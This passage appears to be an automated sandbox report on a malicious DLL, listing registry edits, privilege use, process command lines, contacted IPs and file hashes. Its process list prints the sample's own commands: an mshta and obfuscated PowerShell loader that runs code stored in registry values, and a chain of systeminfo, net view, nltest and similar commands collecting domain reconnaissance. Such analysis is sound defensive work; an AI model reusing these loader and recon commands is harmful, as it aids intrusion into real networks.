| Set value (str) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\79f94f1f-3f21-40df- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\33c0dd8d-a0ef-4efa- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\575f4703-32d0-4b71- = dd0d9f9238a7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\06c865ff-b5f4-4ab0- = [binary value omitted] | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6781d2d3-a64b-43be- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\d8b325ff-b8d9-4e3d- = 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 | C:\Windows\System32\RuntimeBroker.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\8fcfb8f38d8607c57f08f9b39139065f.dll
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ratm='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ratm).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EE2128B7-7580-5017-6F02-79841356BDF8\\\ChipUrls'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nskttcvte -value gp; new-alias -name cnejji -value iex; cnejji ([System.Text.Encoding]::ASCII.GetString((nskttcvte "HKCU:Software\AppDataLow\Software\Microsoft\EE2128B7-7580-5017-6F02-79841356BDF8").BlackVirtual))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7417.tmp" "c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp" "c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\5197.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\5197.bin1 > C:\Users\Admin\AppData\Local\Temp\5197.bin & del C:\Users\Admin\AppData\Local\Temp\5197.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.220.29:80 | | tcp |
| NL | 104.80.225.205:443 | | tcp |
| FR | 51.11.192.48:443 | | tcp |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| US | 8.253.183.249:80 | | tcp |
| US | 8.253.183.249:80 | | tcp |
| US | 8.253.183.249:80 | | tcp |
| US | 8.253.183.249:80 | | tcp |
| RO | 37.120.206.71:80 | 37.120.206.71 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| RO | 37.120.206.91:80 | 37.120.206.91 | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/1952-130-0x0000000000000000-mapping.dmp
memory/1952-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1952-136-0x0000000001320000-0x000000000132D000-memory.dmp
memory/1728-140-0x0000000000000000-mapping.dmp
memory/1728-141-0x000002B3708B0000-0x000002B3708D2000-memory.dmp
memory/1728-142-0x00007FFC8A9B0000-0x00007FFC8B471000-memory.dmp
memory/2004-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.cmdline
| MD5 | 12ecb4fb620b5882813954a0dd3bbe0c |
| SHA1 | 8c047cfed98be681a04acc40e09928d52eab01c7 |
| SHA256 | b97bdb663a1661bbaa1f4702bbb32a0dd4c86b19cdf9901be415c16e68489a31 |
| SHA512 | c7a0e26b9f4ce49b05b49b1781ee34e952f493d1e6b9af284ca1a6ba200fff63c1a55630b9abc1baebb48c53d4f33a18b8822bccda6692e375a490f88b5b0833 |
\??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/4544-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\w3dxaopk\CSCB9B8B9D8B5CA437C80328F8EA80CAB0.TMP
| MD5 | ba06d89e40a9d3b36e8ac118ce494371 |
| SHA1 | bb93c0c2d25fcdaf02373900cc54ccf82a14a3f6 |
| SHA256 | fbae2576c9c385dd1d1c62b801ef45b5da0cd382223961289a7affba52a35393 |
| SHA512 | 9b190f0b9e1101bc069105cd1f85683780808fc646f1ba207bc28632bc6af948144952b52be0fb7c4f3116514c6dadeba32c45d5fd2ef445eb387cb021eb9c9d |
C:\Users\Admin\AppData\Local\Temp\RES7417.tmp
| MD5 | 4c841c934fa6a78ccf121587f366d0b6 |
| SHA1 | 5a4488f8d588f94bcd62cc05baca0f9e20520784 |
| SHA256 | 14f38bbad97561638c6a6c0b185183be9b559b2b4e20e43ac7b773b637df46b7 |
| SHA512 | a95e76af847c184bcb0373e553fe7ced8390e54ef76673cf2f5218f26bb5302420807958c51a86333fc40a39cc56986742575b0a133ed7dcc5ce08c6833317ea |
C:\Users\Admin\AppData\Local\Temp\w3dxaopk\w3dxaopk.dll
| MD5 | 20304a71733030087e99660755f37ccf |
| SHA1 | 5a67e4c45d514c3fbec6fb68efa418f01978ec5b |
| SHA256 | 76f33acda34395c4ed965bd7335187a2f654ce5837141b0de4304f1889c977b3 |
| SHA512 | 3053b927e33a3cf5e95cebf33c59ef417bce62957b492fd34123ae54d80c2c8dec6e116f10cc34e9d72dc1dbb08f8095bb057fa87950e61cf6e327700b3f58d1 |
memory/4568-150-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.cmdline
| MD5 | 20b9b70df3d4658141b57560c7c22a38 |
| SHA1 | 0a2352c94ecad22dcba6fa906f67b78dcf3deedc |
| SHA256 | c4e57ab90f35af1c50c0ef56cce03a0afbe88f25580ce341517b7090bddadbb5 |
| SHA512 | 4a114c5d889ce18baace7eaea951133fb1f3f4527347932557ef332119973f1251ae1617cd1c068fd7ca73872532424f884e836ce4479f6c0c0e816b027a9aba |
\??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
| SHA256 | cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27 |
| SHA512 | a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6 |
memory/3680-153-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\afgiuia5\CSCD482813CBE8E409C9DB2982A59804511.TMP
| MD5 | c4def6b5c560f90a9d42b30035510659 |
| SHA1 | 0d04c1cbda9e499aaa1f2119f0b7b084789e4574 |
| SHA256 | 1983acd2d6ee9b85d6ff05dac77ba2f7790d7716e746e4a60b7737b872f9b0d0 |
| SHA512 | 258532762891cbfa0bed534d1a56afd5c8fab50b47c7a93c550dfb49ceb26ea52a8fcbdd96355d367941f55d7e9fd400a07c5f066522a2c83911a119b2154b1f |
C:\Users\Admin\AppData\Local\Temp\RES75DC.tmp
| MD5 | 392a9a94fc13026a8f63aba8c69dd50d |
| SHA1 | bd9cd8fe89cd05eaaf75b8f4f9b32cb6d7d225fa |
| SHA256 | 64d1ec13e3d608c07beac5c80da5b8b1a9db08d5b3e0ccbdc188f4c1976aee70 |
| SHA512 | 6827d3a3b1d5e29ec226e5ae64f85bf1480c0880ac5642a870cfd24a360368f709c24f390083d8ef4f100c9dff8673a894e171a0d88fcc65aba6da7643544197 |
C:\Users\Admin\AppData\Local\Temp\afgiuia5\afgiuia5.dll
| MD5 | b7802039aed10976472f4877a76f820e |
| SHA1 | f678a9ee21f18009e0f0d1ddb984e49d36e34448 |
| SHA256 | b203353eac13acb7f6d839cc66248d8d7b8d0945d653ec97ff3e9fc58882a530 |
| SHA512 | 86433ddeef9a734d635a92a45753f1de23ce9661539709817da4141fb7f6aaedf499c07dbe84908edf197a8a1c8f12471eff9f57654977a8e50f5d5401b7afdc |
memory/1728-157-0x00007FFC8A9B0000-0x00007FFC8B471000-memory.dmp
memory/1728-158-0x000002B370E20000-0x000002B370E5D000-memory.dmp
memory/2588-159-0x0000000008C40000-0x0000000008CE3000-memory.dmp
memory/4584-160-0x0000000000000000-mapping.dmp
memory/4752-161-0x0000000000000000-mapping.dmp
memory/3344-162-0x0000000000000000-mapping.dmp
memory/1984-163-0x0000000000000000-mapping.dmp
memory/4752-164-0x0000000000826B20-0x0000000000826B24-memory.dmp
memory/4752-165-0x00000000013F0000-0x0000000001486000-memory.dmp
memory/3396-166-0x0000023B70780000-0x0000023B70823000-memory.dmp
memory/3664-167-0x000002297F740000-0x000002297F7E3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | f7aea2435aa888b709ca20f816c33bfd |
| SHA1 | 38717c9a73b5f8bd399839cbe0aa57518427e758 |
| SHA256 | f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5 |
| SHA512 | 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232 |
memory/2816-171-0x0000000000000000-mapping.dmp
memory/3520-169-0x000002A7FC800000-0x000002A7FC8A3000-memory.dmp
memory/4372-168-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/452-173-0x0000000000000000-mapping.dmp
memory/2588-174-0x0000000009160000-0x000000000929B000-memory.dmp
memory/2588-178-0x0000000009460000-0x000000000959A000-memory.dmp
memory/4360-182-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | 6bb53db491181e660601e1440f5dc723 |
| SHA1 | c6691aaad8c7cc09fc3166e38e5c88330c50dae7 |
| SHA256 | 3cc045ad8d52f170514010827086ca8963ec144f3a3ec4beaccd3adcd5808f59 |
| SHA512 | 56147d208569f30f30cabc3f64c19bde4a40c259e5cb61ab378fe902b902d25c80f055286e5abeb92ecc2e88375a06800e95a4161b63737a09c2d7d0be24092f |
memory/4180-184-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | ba1cacc02ab4d42993da9e2a00150c4e |
| SHA1 | a27f508c5a3ddd3c702157c07625d57a0ec44d39 |
| SHA256 | 9c76797bc60c4811103cf2ca87581d7a68b8b72b3aece21dcf580a69a0acd366 |
| SHA512 | 808c4c7105940a7610efd63e07bb4494459c47acd794a2f67a13f38df7fd21f65ad7ff2b970c1874bfe54adb8dcc2b07a11062201139887b09d16ecce0b70070 |
memory/676-186-0x0000000000000000-mapping.dmp
memory/2588-187-0x0000000008C40000-0x0000000008CE3000-memory.dmp
memory/4652-188-0x0000000000000000-mapping.dmp
memory/4836-189-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | 5a48006096bd97eb23923e47e5a81f6a |
| SHA1 | 65d5f9e89cc05c17980eb41b0f609bf3e956bfa7 |
| SHA256 | 889d10b8b462027785dea9ab3bfe5f5658cb1169b5f4b77219f0411086bf3e60 |
| SHA512 | 2d0913f8e6f597c6bf4561befb168cf9f6ec733125445a611eae7c73ca5861c8c6fc1706519507ab642f29c48616a463b4b558db229d7c2c9ff6dc498f7ecda9 |
memory/3660-191-0x0000000000000000-mapping.dmp
memory/3548-192-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | eb957e958d464123d032e63278336f4a |
| SHA1 | 327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e |
| SHA256 | fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013 |
| SHA512 | b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087 |
memory/2040-194-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | eb957e958d464123d032e63278336f4a |
| SHA1 | 327e49a7ad346aa5bea407fcdf96abbf3e2f7a6e |
| SHA256 | fc740bfd640337c775d8f8bacf45526aa6cf162d52c9a67a29448a8e027b3013 |
| SHA512 | b5a10602d7c09e6634b183ab99bd07dd0153eaa055bf88e8116337b267775c4ff65bcfa24112a4636cae3d5b502002d369795de3a27adf2e4009df2e055fc087 |
memory/1196-196-0x0000000000000000-mapping.dmp
memory/3320-197-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | c24e1e3d7e76a3f0190c8285a952ba2d |
| SHA1 | 20789bba0b334b28960a0810bc099fbb5af86618 |
| SHA256 | 071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5 |
| SHA512 | c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397 |
memory/1300-199-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | c24e1e3d7e76a3f0190c8285a952ba2d |
| SHA1 | 20789bba0b334b28960a0810bc099fbb5af86618 |
| SHA256 | 071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5 |
| SHA512 | c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397 |
memory/4216-201-0x0000000000000000-mapping.dmp
memory/2084-202-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | f2440c2ca7c021d3e23515050be042ea |
| SHA1 | 40dbec088209f383f75822fc17e5cec3c81b61b2 |
| SHA256 | e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a |
| SHA512 | 980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874 |
memory/4272-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | f2440c2ca7c021d3e23515050be042ea |
| SHA1 | 40dbec088209f383f75822fc17e5cec3c81b61b2 |
| SHA256 | e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a |
| SHA512 | 980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874 |
memory/2836-206-0x0000000000000000-mapping.dmp
memory/2564-207-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
| MD5 | f2eba9bd62ee1de79653a2be84b84e82 |
| SHA1 | 456899ba747afa3ac16412290ea9c6192b426cfd |
| SHA256 | 82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7 |
| SHA512 | 3e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe |
memory/1340-209-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\5197.bin1
